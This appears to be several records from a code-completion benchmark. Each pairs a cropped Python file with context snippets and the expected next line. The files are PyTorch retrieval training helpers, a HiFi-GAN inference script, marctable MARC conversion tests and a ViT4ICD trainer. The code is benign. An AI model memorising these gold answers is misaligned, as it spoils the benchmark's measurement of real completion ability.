"model_cls": VisionT5MeanBiEncoder,
},
"VisionT5SimpleBiEncoderHN": {
"model_cls": VisionT5SimpleBiEncoderHN,
},
"VisionT5MeanBiEncoderHN": {
| # Copyright 2022 san kim
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
logger = logging.getLogger(__name__)
def broadcast(tensors, rank=0):
rt = tensors.clone().detach()
torch.distributed.broadcast(rt, rank)
return rt
def reduce_tensor(tensor, args):
rt = tensor.clone().detach()
dist.all_reduce(rt, op=dist.ReduceOp.SUM)
rt /= args.world_size
return rt
def reduce_sum_tensor(tensor):
rt = tensor.clone().detach()
dist.all_reduce(rt, op=dist.ReduceOp.SUM)
return rt
def all_gather(tensors, args, **kwargs):
rt = tensors.clone().detach()
tensor_list = [torch.zeros_like(rt) for _ in range(args.world_size)]
torch.distributed.all_gather(tensor_list, rt)
return tensor_list
def compute_loss(model, batch, loss_fn, args):
outputs = model(batch)
# outputs: language_repr, vision_repr- [batch_size, model_dim]
batch_size = outputs["language_repr"].size(0)
scores = torch.mm(outputs["language_repr"], outputs["vision_repr"].t())
# scores(diagonal): [batch_size, batch_size]
target = torch.arange(batch_size).to(outputs["language_repr"].device)
retrieve_loss = loss_fn(scores/args.logit_temperature, target) + loss_fn(scores.t()/args.logit_temperature, target)
return retrieve_loss
def compute_loss_over_device(model, batch, loss_fn, args):
outputs = model(batch)
# outputs: language_repr, vision_repr- [batch_size, model_dim]
language_repr = outputs["language_repr"]
vision_repr = outputs["vision_repr"]
batch_size = language_repr.size(0)
# blocking call (all_gather)
with torch.no_grad():
language_repr_gathered = all_gather(language_repr, args)
vision_repr_gathered = all_gather(vision_repr, args)
# language_repr_gathered, vision_repr_gathered - [world_size, batch_size, model_dim]
language_repr_gathered[args.rank] = language_repr
vision_repr_gathered[args.rank] = vision_repr
language_repr_cat = torch.cat(language_repr_gathered, dim=0)
vision_repr_cat = torch.cat(vision_repr_gathered, dim=0)
# language_repr_cat, vision_repr_cat - [batch_size*world_size, model_dim]
scores = torch.mm(language_repr_cat, vision_repr_cat.t())
target = torch.arange(batch_size * args.world_size).to(language_repr.device)
retrieve_loss = loss_fn(scores, target)
return retrieve_loss
def retrieval_eval(model, batch):
outputs = model(batch)
# outputs: language_repr, vision_repr- [batch_size, model_dim]
batch_size = outputs["language_repr"].size(0)
scores = torch.mm(outputs["language_repr"], outputs["vision_repr"].t())
target = torch.arange(batch_size).to(outputs["language_repr"].device)
# scores: [batch_size, batch_size]
ranked = scores.argsort(dim=1, descending=True)
# [[0.1, 0.3, -0.2, 0.14 ]] -> [[1, 3, 0, 2]] (index of score - descending order)
idx2ranked_t = ranked.argsort(dim=1)
# [[1, 3, 0, 2]] -> [[2, 0, 3, 1]] (index to rank)
rrs = []
for t, idx2ranked in zip(target, idx2ranked_t):
rrs.append(1 / (idx2ranked[t].item() + 1))
# reciprocal rank for 1st, 2nd hop
return {
"mrr": torch.tensor(np.mean(rrs)).to(outputs["language_repr"].device)
}
def create_dir_if_not_exist(path):
if not os.path.isdir(path):
os.makedirs(path, exist_ok=True)
def create_directory_info(args, create_dir=True):
model_dir = os.path.join(args.output_dir, "{}-{}-{}".format(
args.model_cls.replace('/', '_'),
args.vision_model.replace('/', '_'),
args.language_model.replace('/', '_')))
if args.dir_suffix is not None:
model_dir = '_'.join([model_dir, args.dir_suffix])
weights_dir = os.path.join(model_dir, "weights")
logs_dir = os.path.join(model_dir, "logs")
path_info = {
'model_dir': model_dir,
'weights_dir': weights_dir,
'logs_dir': logs_dir,
}
if create_dir:
for k, v in path_info.items():
create_dir_if_not_exist(v)
path_info['best_model_path'] = os.path.join(weights_dir, "best_model.pth")
path_info['ckpt_path'] = os.path.join(weights_dir, "checkpoint.pth")
return path_info
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def save_checkpoint(state, is_best, filename='checkpoint.pth', best_filename='model_best.pth'):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, best_filename)
def get_env_var(env_var, type_cls, default_val):
if env_var in os.environ:
return type_cls(os.environ[env_var])
return default_val
MODEL_CLS = {
"VisionT5SimpleBiEncoder": {
"model_cls": VisionT5SimpleBiEncoder,
},
"VisionT5MeanBiEncoder": {
"model_cls": VisionT5MeanBiEncoder,
},
"VisionT5SimpleBiEncoderHN": {
"model_cls": VisionT5SimpleBiEncoderHN,
},
"VisionT5MeanBiEncoderHN": { | "model_cls": VisionT5MeanBiEncoderHN, | 4 | 2023-12-18 10:37:51+00:00 | 4k |
liuhuang31/hifigan-sr | inference.py | [
{
"identifier": "AttrDict",
"path": "env.py",
"snippet": "class AttrDict(dict):\n def __init__(self, *args, **kwargs):\n super(AttrDict, self).__init__(*args, **kwargs)\n self.__dict__ = self"
},
{
"identifier": "mel_spectrogram",
"path": "meldataset.py",
"snippet": "def mel_spectrogram(y, n_fft, num_mels, sampling_rate, hop_size, win_size, fmin, fmax, center=False, training=False):\n # if torch.min(y) < -1.:\n # print('min value is ', torch.min(y))\n # if torch.max(y) > 1.:\n # print('max value is ', torch.max(y))\n if training:\n with torch.no_grad():\n # 16k to 24k/48k\n if fmax <= 8000 and (sampling_rate == 24000 or sampling_rate == 48000):\n y = y.squeeze().cpu().numpy()\n y = librosa.resample(y, sampling_rate, 16000)\n y = librosa.resample(y, 16000, 24000)\n y = torch.FloatTensor(y)\n y = y.unsqueeze(0)\n sampling_rate = 24000\n n_fft = int(n_fft/2)\n hop_size=int(hop_size/2)\n win_size=int(win_size/2)\n # 24k to 48k\n elif fmax <= 12000 and sampling_rate == 48000:\n y = y.squeeze().cpu().numpy()\n y = librosa.resample(y, sampling_rate, 24000)\n y = torch.FloatTensor(y)\n y = y.unsqueeze(0)\n sampling_rate = 24000\n n_fft = int(n_fft/2)\n hop_size=int(hop_size/2)\n win_size=int(win_size/2)\n else:\n pass\n\n global mel_basis, hann_window\n if fmax not in mel_basis:\n mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax)\n mel_basis[str(fmax)+'_'+str(y.device)] = torch.from_numpy(mel).float().to(y.device)\n hann_window[str(y.device)] = torch.hann_window(win_size).to(y.device)\n\n y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect')\n y = y.squeeze(1)\n\n spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[str(y.device)],\n center=center, pad_mode='reflect', normalized=False, onesided=True)\n\n spec = torch.sqrt(spec.pow(2).sum(-1)+(1e-9))\n\n spec = torch.matmul(mel_basis[str(fmax)+'_'+str(y.device)], spec)\n spec = spectral_normalize_torch(spec)\n\n return spec"
},
{
"identifier": "MAX_WAV_VALUE",
"path": "meldataset.py",
"snippet": "MAX_WAV_VALUE = 32768.0"
},
{
"identifier": "load_wav",
"path": "meldataset.py",
"snippet": "def load_wav(full_path, sr):\n # sampling_rate, data = read(full_path)\n data, sampling_rate = librosa.load(full_path, mono=True, sr=sr)\n return data, sampling_rate"
},
{
"identifier": "Generator",
"path": "models.py",
"snippet": "class Generator(torch.nn.Module):\n def __init__(self, h):\n super(Generator, self).__init__()\n self.h = h\n self.num_kernels = len(h.resblock_kernel_sizes)\n self.num_upsamples = len(h.upsample_rates)\n self.conv_pre = weight_norm(Conv1d(80, h.upsample_initial_channel, 7, 1, padding=3))\n resblock = ResBlock1 if h.resblock == '1' else ResBlock2\n\n self.ups = nn.ModuleList()\n for i, (u, k) in enumerate(zip(h.upsample_rates, h.upsample_kernel_sizes)):\n self.ups.append(weight_norm(\n ConvTranspose1d(h.upsample_initial_channel//(2**i), h.upsample_initial_channel//(2**(i+1)),\n k, u, padding=(k-u)//2)))\n\n self.resblocks = nn.ModuleList()\n for i in range(len(self.ups)):\n ch = h.upsample_initial_channel//(2**(i+1))\n for j, (k, d) in enumerate(zip(h.resblock_kernel_sizes, h.resblock_dilation_sizes)):\n self.resblocks.append(resblock(h, ch, k, d))\n\n self.conv_post = weight_norm(Conv1d(ch, 1, 7, 1, padding=3))\n self.ups.apply(init_weights)\n self.conv_post.apply(init_weights)\n\n def forward(self, x):\n x = self.conv_pre(x)\n for i in range(self.num_upsamples):\n x = F.leaky_relu(x, LRELU_SLOPE)\n x = self.ups[i](x)\n xs = None\n for j in range(self.num_kernels):\n if xs is None:\n xs = self.resblocks[i*self.num_kernels+j](x)\n else:\n xs += self.resblocks[i*self.num_kernels+j](x)\n x = xs / self.num_kernels\n x = F.leaky_relu(x)\n x = self.conv_post(x)\n x = torch.tanh(x)\n\n return x\n\n def remove_weight_norm(self):\n print('Removing weight norm...')\n for l in self.ups:\n remove_weight_norm(l)\n for l in self.resblocks:\n l.remove_weight_norm()\n remove_weight_norm(self.conv_pre)\n remove_weight_norm(self.conv_post)"
}
] | import glob
import os
import librosa
import argparse
import json
import torch
from scipy.io.wavfile import write
from env import AttrDict
from meldataset import mel_spectrogram, MAX_WAV_VALUE, load_wav
from models import Generator | 1,985 | from __future__ import absolute_import, division, print_function, unicode_literals
h = None
device = None
def load_checkpoint(filepath, device):
assert os.path.isfile(filepath)
print("Loading '{}'".format(filepath))
checkpoint_dict = torch.load(filepath, map_location=device)
print("Complete.")
return checkpoint_dict
def get_mel(x):
return mel_spectrogram(x, h.n_fft, h.num_mels, h.sampling_rate, h.hop_size, h.win_size, h.fmin, h.fmax)
def get_mel_24k(x):
return mel_spectrogram(x, 1024, h.num_mels, 24000, 240, 1024, h.fmin, 8000)
def scan_checkpoint(cp_dir, prefix):
pattern = os.path.join(cp_dir, prefix + '*')
cp_list = glob.glob(pattern)
if len(cp_list) == 0:
return ''
return sorted(cp_list)[-1]
def inference(a):
generator = Generator(h).to(device)
state_dict_g = load_checkpoint(a.checkpoint_file, device)
generator.load_state_dict(state_dict_g['generator'])
filelist = os.listdir(a.input_wavs_dir)
os.makedirs(a.output_dir, exist_ok=True)
generator.eval()
generator.remove_weight_norm()
with torch.no_grad():
for i, filname in enumerate(filelist):
# wav, sr = load_wav(os.path.join(a.input_wavs_dir, filname))
# wav = wav / MAX_WAV_VALUE
wav, _ = librosa.load(os.path.join(a.input_wavs_dir, filname), mono=True, sr=16000)
wav = librosa.resample(wav, 16000, 24000, fix=True, scale=False)
wav = torch.FloatTensor(wav).to(device)
x = get_mel_24k(wav.unsqueeze(0))
y_g_hat = generator(x)
audio = y_g_hat.squeeze()
audio = audio * MAX_WAV_VALUE
audio = audio.cpu().numpy().astype('int16')
output_file = os.path.join(a.output_dir, os.path.splitext(filname)[0] + '_generated.wav')
write(output_file, h.sampling_rate, audio)
print(output_file)
def main():
print('Initializing Inference Process..')
parser = argparse.ArgumentParser()
parser.add_argument('--input_wavs_dir', default='test_files')
parser.add_argument('--output_dir', default='generated_files')
parser.add_argument('--checkpoint_file', required=True)
a = parser.parse_args()
config_file = os.path.join(os.path.split(a.checkpoint_file)[0], 'config.json')
with open(config_file) as f:
data = f.read()
global h
json_config = json.loads(data)
| from __future__ import absolute_import, division, print_function, unicode_literals
h = None
device = None
def load_checkpoint(filepath, device):
assert os.path.isfile(filepath)
print("Loading '{}'".format(filepath))
checkpoint_dict = torch.load(filepath, map_location=device)
print("Complete.")
return checkpoint_dict
def get_mel(x):
return mel_spectrogram(x, h.n_fft, h.num_mels, h.sampling_rate, h.hop_size, h.win_size, h.fmin, h.fmax)
def get_mel_24k(x):
return mel_spectrogram(x, 1024, h.num_mels, 24000, 240, 1024, h.fmin, 8000)
def scan_checkpoint(cp_dir, prefix):
pattern = os.path.join(cp_dir, prefix + '*')
cp_list = glob.glob(pattern)
if len(cp_list) == 0:
return ''
return sorted(cp_list)[-1]
def inference(a):
generator = Generator(h).to(device)
state_dict_g = load_checkpoint(a.checkpoint_file, device)
generator.load_state_dict(state_dict_g['generator'])
filelist = os.listdir(a.input_wavs_dir)
os.makedirs(a.output_dir, exist_ok=True)
generator.eval()
generator.remove_weight_norm()
with torch.no_grad():
for i, filname in enumerate(filelist):
# wav, sr = load_wav(os.path.join(a.input_wavs_dir, filname))
# wav = wav / MAX_WAV_VALUE
wav, _ = librosa.load(os.path.join(a.input_wavs_dir, filname), mono=True, sr=16000)
wav = librosa.resample(wav, 16000, 24000, fix=True, scale=False)
wav = torch.FloatTensor(wav).to(device)
x = get_mel_24k(wav.unsqueeze(0))
y_g_hat = generator(x)
audio = y_g_hat.squeeze()
audio = audio * MAX_WAV_VALUE
audio = audio.cpu().numpy().astype('int16')
output_file = os.path.join(a.output_dir, os.path.splitext(filname)[0] + '_generated.wav')
write(output_file, h.sampling_rate, audio)
print(output_file)
def main():
print('Initializing Inference Process..')
parser = argparse.ArgumentParser()
parser.add_argument('--input_wavs_dir', default='test_files')
parser.add_argument('--output_dir', default='generated_files')
parser.add_argument('--checkpoint_file', required=True)
a = parser.parse_args()
config_file = os.path.join(os.path.split(a.checkpoint_file)[0], 'config.json')
with open(config_file) as f:
data = f.read()
global h
json_config = json.loads(data) | h = AttrDict(json_config) | 0 | 2023-12-16 01:21:00+00:00 | 4k |
edsu/marctable | test_marctable.py | [
{
"identifier": "MARC",
"path": "marctable/marc.py",
"snippet": "class MARC:\n def __init__(self) -> None:\n self.fields: List[Field] = []\n\n @cache\n def get_field(self, tag: str) -> Field:\n for field in self.fields:\n if field.tag == tag:\n return field\n raise SchemaFieldError(f\"{tag} is not a defined field tag in Avram schema\")\n\n @cache\n def get_subfield(self, tag: str, code: str) -> Subfield:\n field = self.get_field(tag)\n return field.get_subfield(code)\n\n @property\n def avram_file(self) -> pathlib.Path:\n return pathlib.Path(__file__).parent / \"marc.json\"\n\n @classmethod\n @cache\n def from_avram(cls: Type[\"MARC\"], avram_file: Optional[IO] = None) -> \"MARC\":\n marc = MARC()\n\n if avram_file is None:\n avram_file = marc.avram_file.open(\"r\")\n\n for d in json.load(avram_file)[\"fields\"].values():\n marc.fields.append(Field.from_dict(d))\n\n return marc\n\n def to_avram(self, avram_file: Optional[IO] = None) -> None:\n if avram_file is None:\n avram_file = self.avram_file.open(\"w\")\n\n d = {\n \"title\": \"MARC21 bibliographic format\",\n \"url\": \"https://www.loc.gov/marc/bibliographic/\",\n \"family\": \"marc\",\n \"language\": \"en\",\n \"fields\": {f.tag: f.to_dict() for f in self.fields},\n }\n json.dump(d, avram_file, indent=2)"
},
{
"identifier": "SchemaFieldError",
"path": "marctable/marc.py",
"snippet": "class SchemaFieldError(Exception):\n pass"
},
{
"identifier": "SchemaSubfieldError",
"path": "marctable/marc.py",
"snippet": "class SchemaSubfieldError(Exception):\n pass"
},
{
"identifier": "crawl",
"path": "marctable/marc.py",
"snippet": "def crawl(n: int = 0, quiet: bool = False, outfile: IO = sys.stdout) -> None:\n marc = MARC()\n for f in fields():\n marc.fields.append(f)\n if not quiet:\n print(f)\n if n != 0 and len(marc.fields) >= n:\n break\n marc.to_avram(outfile)"
},
{
"identifier": "_mapping",
"path": "marctable/utils.py",
"snippet": "def _mapping(rules: list) -> dict:\n \"\"\"\n unpack the mapping rules into a dictionary for easy lookup\n\n >>> _mapping([\"245\", \"260ac\"])\n {'245': None, '260': ['a', 'c']}\n \"\"\"\n marc = MARC.from_avram()\n if rules is None or len(rules) == 0:\n rules = [field.tag for field in marc.fields]\n\n m = {}\n for rule in rules:\n field_tag = rule[0:3]\n if marc.get_field(field_tag) is None:\n raise Exception(f\"unknown MARC field in mapping rule: {rule}\")\n\n subfields = set(list(rule[3:]))\n for subfield_code in subfields:\n if marc.get_subfield(field_tag, subfield_code) is None:\n raise Exception(f\"unknown MARC subfield in mapping rule: {rule}\")\n\n m[field_tag] = subfields or None\n\n return m"
},
{
"identifier": "dataframe_iter",
"path": "marctable/utils.py",
"snippet": "def dataframe_iter(\n marc_input: BinaryIO, rules: list = [], batch: int = 1000\n) -> Generator[DataFrame, None, None]:\n columns = _columns(_mapping(rules))\n for records_batch in records_iter(marc_input, rules, batch):\n yield DataFrame.from_records(records_batch, columns=columns)"
},
{
"identifier": "to_csv",
"path": "marctable/utils.py",
"snippet": "def to_csv(\n marc_input: BinaryIO,\n csv_output: TextIO,\n rules: list = [],\n batch: int = 1000,\n) -> None:\n \"\"\"\n Convert MARC to CSV.\n \"\"\"\n first_batch = True\n for df in dataframe_iter(marc_input, rules=rules, batch=batch):\n df.to_csv(csv_output, header=first_batch, index=False)\n first_batch = False"
},
{
"identifier": "to_dataframe",
"path": "marctable/utils.py",
"snippet": "def to_dataframe(marc_input: BinaryIO, rules: list = []) -> DataFrame:\n \"\"\"\n Return a single DataFrame for the entire dataset.\n \"\"\"\n return next(dataframe_iter(marc_input, rules, batch=0))"
},
{
"identifier": "to_parquet",
"path": "marctable/utils.py",
"snippet": "def to_parquet(\n marc_input: BinaryIO,\n parquet_output: IOBase,\n rules: list = [],\n batch: int = 1000,\n) -> None:\n \"\"\"\n Convert MARC to Parquet.\n \"\"\"\n schema = _make_parquet_schema(rules)\n writer = ParquetWriter(parquet_output, schema, compression=\"SNAPPY\")\n for records_batch in records_iter(marc_input, rules=rules, batch=batch):\n table = pyarrow.Table.from_pylist(records_batch, schema)\n writer.write_table(table)\n\n writer.close()"
}
] | import json
import pathlib
import pandas
from io import StringIO
from marctable.marc import MARC, SchemaFieldError, SchemaSubfieldError, crawl
from marctable.utils import _mapping, dataframe_iter, to_csv, to_dataframe, to_parquet
from pytest import raises | 2,512 | f015 = schema["fields"]["015"]
assert f015["label"] == "National Bibliography Number"
assert f015["url"] == "https://www.loc.gov/marc/bibliographic/bd015.html"
assert len(f015["subfields"]) == 6
# ensure that the Avram JSON for a subfield looks ok
assert f015["subfields"]["2"]
f0152 = f015["subfields"]["2"]
assert f0152["label"] == "Source"
assert f0152["code"] == "2"
assert f0152["repeatable"] is False
def test_marc() -> None:
assert len(marc.fields) == 215
def test_get_field() -> None:
assert marc.get_field("245")
with raises(SchemaFieldError, match="abc is not a defined field tag in Avram"):
marc.get_field("abc")
def test_get_subfield() -> None:
assert marc.get_subfield("245", "a").label == "Title"
with raises(SchemaSubfieldError, match="- is not a valid subfield in field 245"):
marc.get_subfield("245", "-") is None
def test_non_repeatable_field() -> None:
f245 = marc.get_field("245")
assert f245.tag == "245"
assert f245.label == "Title Statement"
assert f245.repeatable is False
def test_repeatable_field() -> None:
f650 = marc.get_field("650")
assert f650.tag == "650"
assert f650.label == "Subject Added Entry-Topical Term"
assert f650.repeatable is True
def test_df() -> None:
df = to_dataframe(open("test-data/utf8.marc", "rb"))
assert len(df.columns) == 215
assert len(df) == 10612
assert df.iloc[0]["F008"] == "000110s2000 ohu f m eng "
# 245 is not repeatable
assert (
df.iloc[0]["F245"]
== "Leak testing CD-ROM [computer file] / technical editors, Charles N. "
"Jackson, Jr., Charles N. Sherlock ; editor, Patrick O. Moore."
)
# 650 is repeatable
assert df.iloc[0]["F650"] == ["Leak detectors.", "Gas leakage."]
def test_custom_fields_df() -> None:
df = to_dataframe(open("test-data/utf8.marc", "rb"), rules=["245", "650"])
assert len(df) == 10612
# should only have two columns in the dataframe
assert len(df.columns) == 2
assert df.columns[0] == "F245"
assert df.columns[1] == "F650"
assert (
df.iloc[0]["F245"]
== "Leak testing CD-ROM [computer file] / technical editors, Charles N. "
"Jackson, Jr., Charles N. Sherlock ; editor, Patrick O. Moore."
)
assert df.iloc[0]["F650"] == ["Leak detectors.", "Gas leakage."]
def test_custom_subfields_df() -> None:
df = to_dataframe(open("test-data/utf8.marc", "rb"), rules=["245a", "260c"])
assert len(df) == 10612
assert len(df.columns) == 2
assert df.columns[0] == "F245a"
assert df.columns[1] == "F260c"
# 245a is not repeatable
assert df.iloc[0]["F245a"] == "Leak testing CD-ROM"
# 260c is repeatable
assert df.iloc[0]["F260c"] == ["c2000."]
def test_field_mapping() -> None:
m = _mapping(["245", "650"])
assert m["245"] is None
assert m["650"] is None
def test_field_subfield_mapping() -> None:
m = _mapping(["245a", "650ax", "260"])
assert set(m["245"]) == set(["a"])
assert set(m["650"]) == set(["a", "x"])
assert m["260"] is None
def test_batch() -> None:
dfs = dataframe_iter(open("test-data/utf8.marc", "rb"), batch=1000)
df = next(dfs)
assert type(df), pandas.DataFrame
assert len(df) == 1000
def test_to_csv() -> None:
to_csv(
open("test-data/utf8.marc", "rb"), open("test-data/utf8.csv", "w"), batch=1000
)
df = pandas.read_csv("test-data/utf8.csv")
assert len(df) == 10612
assert len(df.columns) == 215
assert (
df.iloc[0]["F245"]
== "Leak testing CD-ROM [computer file] / technical editors, Charles N. "
"Jackson, Jr., Charles N. Sherlock ; editor, Patrick O. Moore."
)
def test_to_parquet() -> None:
|
marc = MARC.from_avram()
def test_crawl() -> None:
# crawl the first 10 field definitions from the loc site (to save time)
outfile = StringIO()
crawl(10, quiet=True, outfile=outfile)
outfile.seek(0)
# ensure the Avram JSON parses and looks ok
schema = json.load(outfile)
assert schema
assert len(schema["fields"]) == 10
# ensure that the Avram JSON for a field looks ok
assert schema["fields"]["015"]
f015 = schema["fields"]["015"]
assert f015["label"] == "National Bibliography Number"
assert f015["url"] == "https://www.loc.gov/marc/bibliographic/bd015.html"
assert len(f015["subfields"]) == 6
# ensure that the Avram JSON for a subfield looks ok
assert f015["subfields"]["2"]
f0152 = f015["subfields"]["2"]
assert f0152["label"] == "Source"
assert f0152["code"] == "2"
assert f0152["repeatable"] is False
def test_marc() -> None:
assert len(marc.fields) == 215
def test_get_field() -> None:
assert marc.get_field("245")
with raises(SchemaFieldError, match="abc is not a defined field tag in Avram"):
marc.get_field("abc")
def test_get_subfield() -> None:
assert marc.get_subfield("245", "a").label == "Title"
with raises(SchemaSubfieldError, match="- is not a valid subfield in field 245"):
marc.get_subfield("245", "-") is None
def test_non_repeatable_field() -> None:
f245 = marc.get_field("245")
assert f245.tag == "245"
assert f245.label == "Title Statement"
assert f245.repeatable is False
def test_repeatable_field() -> None:
f650 = marc.get_field("650")
assert f650.tag == "650"
assert f650.label == "Subject Added Entry-Topical Term"
assert f650.repeatable is True
def test_df() -> None:
df = to_dataframe(open("test-data/utf8.marc", "rb"))
assert len(df.columns) == 215
assert len(df) == 10612
assert df.iloc[0]["F008"] == "000110s2000 ohu f m eng "
# 245 is not repeatable
assert (
df.iloc[0]["F245"]
== "Leak testing CD-ROM [computer file] / technical editors, Charles N. "
"Jackson, Jr., Charles N. Sherlock ; editor, Patrick O. Moore."
)
# 650 is repeatable
assert df.iloc[0]["F650"] == ["Leak detectors.", "Gas leakage."]
def test_custom_fields_df() -> None:
df = to_dataframe(open("test-data/utf8.marc", "rb"), rules=["245", "650"])
assert len(df) == 10612
# should only have two columns in the dataframe
assert len(df.columns) == 2
assert df.columns[0] == "F245"
assert df.columns[1] == "F650"
assert (
df.iloc[0]["F245"]
== "Leak testing CD-ROM [computer file] / technical editors, Charles N. "
"Jackson, Jr., Charles N. Sherlock ; editor, Patrick O. Moore."
)
assert df.iloc[0]["F650"] == ["Leak detectors.", "Gas leakage."]
def test_custom_subfields_df() -> None:
df = to_dataframe(open("test-data/utf8.marc", "rb"), rules=["245a", "260c"])
assert len(df) == 10612
assert len(df.columns) == 2
assert df.columns[0] == "F245a"
assert df.columns[1] == "F260c"
# 245a is not repeatable
assert df.iloc[0]["F245a"] == "Leak testing CD-ROM"
# 260c is repeatable
assert df.iloc[0]["F260c"] == ["c2000."]
def test_field_mapping() -> None:
m = _mapping(["245", "650"])
assert m["245"] is None
assert m["650"] is None
def test_field_subfield_mapping() -> None:
m = _mapping(["245a", "650ax", "260"])
assert set(m["245"]) == set(["a"])
assert set(m["650"]) == set(["a", "x"])
assert m["260"] is None
def test_batch() -> None:
dfs = dataframe_iter(open("test-data/utf8.marc", "rb"), batch=1000)
df = next(dfs)
assert type(df), pandas.DataFrame
assert len(df) == 1000
def test_to_csv() -> None:
to_csv(
open("test-data/utf8.marc", "rb"), open("test-data/utf8.csv", "w"), batch=1000
)
df = pandas.read_csv("test-data/utf8.csv")
assert len(df) == 10612
assert len(df.columns) == 215
assert (
df.iloc[0]["F245"]
== "Leak testing CD-ROM [computer file] / technical editors, Charles N. "
"Jackson, Jr., Charles N. Sherlock ; editor, Patrick O. Moore."
)
def test_to_parquet() -> None: | to_parquet( | 8 | 2023-12-21 21:14:29+00:00 | 4k |
WangWenhao0716/ViT4ICD | Stage_23/dg/trainers_cos_ema_feat_tune.py | [
{
"identifier": "accuracy",
"path": "Stage_23/dg/evaluation_metrics/classification.py",
"snippet": "def accuracy(output, target, topk=(1,)):\n with torch.no_grad():\n output, target = to_torch(output), to_torch(target)\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n ret = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(dim=0, keepdim=True)\n ret.append(correct_k.mul_(1. / batch_size))\n return ret"
},
{
"identifier": "CrossEntropyLabelSmooth",
"path": "Stage_23/dg/loss/crossentropy.py",
"snippet": "class CrossEntropyLabelSmooth(nn.Module):\n \"\"\"Cross entropy loss with label smoothing regularizer.\n\n Reference:\n Szegedy et al. Rethinking the Inception Architecture for Computer Vision. CVPR 2016.\n Equation: y = (1 - epsilon) * y + epsilon / K.\n\n Args:\n num_classes (int): number of classes.\n epsilon (float): weight.\n \"\"\"\n\n def __init__(self, num_classes, epsilon=0.1):\n super(CrossEntropyLabelSmooth, self).__init__()\n self.num_classes = num_classes\n self.epsilon = epsilon\n self.logsoftmax = nn.LogSoftmax(dim=1).cuda()\n\n def forward(self, inputs, targets):\n \"\"\"\n Args:\n inputs: prediction matrix (before softmax) with shape (batch_size, num_classes)\n targets: ground truth labels with shape (num_classes)\n \"\"\"\n log_probs = self.logsoftmax(inputs)\n targets = torch.zeros_like(log_probs).scatter_(1, targets.unsqueeze(1), 1)\n targets = (1 - self.epsilon) * targets + self.epsilon / self.num_classes\n loss = (- targets * log_probs).mean(0).sum()\n return loss"
},
{
"identifier": "AverageMeter",
"path": "Stage_23/dg/utils/meters.py",
"snippet": "class AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count"
},
{
"identifier": "MarginCosineProduct",
"path": "Stage_23/dg/layer.py",
"snippet": "class MarginCosineProduct(nn.Module):\n r\"\"\"Implement of large margin cosine distance: :\n Args:\n in_features: size of each input sample\n out_features: size of each output sample\n s: norm of input feature\n m: margin\n \"\"\"\n\n def __init__(self, in_features, out_features, s=30.0, m=0.40):\n super(MarginCosineProduct, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.s = s\n self.m = m\n self.weight = Parameter(torch.Tensor(out_features, in_features))\n nn.init.xavier_uniform_(self.weight)\n #stdv = 1. / math.sqrt(self.weight.size(1))\n #self.weight.data.uniform_(-stdv, stdv)\n\n def forward(self, input, label):\n cosine = cosine_sim(input, self.weight)\n # cosine = F.linear(F.normalize(input), F.normalize(self.weight))\n # --------------------------- convert label to one-hot ---------------------------\n # https://discuss.pytorch.org/t/convert-int-into-one-hot-format/507\n one_hot = torch.zeros_like(cosine)\n one_hot.scatter_(1, label.view(-1, 1), 1.0)\n # -------------torch.where(out_i = {x_i if condition_i else y_i) -------------\n output = self.s * (cosine - one_hot * self.m)\n\n return output\n\n def __repr__(self):\n return self.__class__.__name__ + '(' \\\n + 'in_features=' + str(self.in_features) \\\n + ', out_features=' + str(self.out_features) \\\n + ', s=' + str(self.s) \\\n + ', m=' + str(self.m) + ')'"
}
] | import time
import torch
import torch.nn as nn
import numpy as np
from torch.nn import functional as F
from .evaluation_metrics import accuracy
from .loss import CrossEntropyLabelSmooth#, CosfacePairwiseLoss
from .utils.meters import AverageMeter
from .layer import MarginCosineProduct | 2,228 | from __future__ import print_function, absolute_import
class Trainer(object):
def __init__(self, model, name_feature_support, num_classes, margin=0.0):
super(Trainer, self).__init__()
self.model = model
self.name_support = np.array(name_feature_support[0])
self.pos = np.argsort(self.name_support)
self.feat_support = name_feature_support[1]
self.criterion_ce = CrossEntropyLabelSmooth(num_classes, epsilon=0).cuda()
self.criterion_ce_1 = CrossEntropyLabelSmooth(num_classes, epsilon=0).cuda()
#self.criterion_support = nn.MSELoss().cuda()#nn.L1Loss().cuda() #nn.MSELoss().cuda()
#self.criterion_cos_pair = CosfacePairwiseLoss(m=0.35, s=64).cuda()
#self.criterion_triple = SoftTripletLoss(margin=margin).cuda()
#self.w_ce = 10
#self.w_tri = 1
#print("The weight for loss_ce is ", self.w_ce)
#print("The weight for loss_tri is ", self.w_tri)
def train(self, epoch, data_loader, data_loader_support, optimizer, ema, train_iters=200, print_freq=1):
self.model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
losses_ce = AverageMeter()
losses_ce_1 = AverageMeter()
losses_sp = AverageMeter()
#losses_cos_pair = AverageMeter()
#losses_tr = AverageMeter()
precisions = AverageMeter()
precisions_1 = AverageMeter()
end = time.time()
for i in range(train_iters):
source_inputs = data_loader.next()
support_image, labels_support = data_loader_support.next()
support_features = torch.Tensor(self.feat_support[self.pos[labels_support]]).cuda()
data_time.update(time.time() - end)
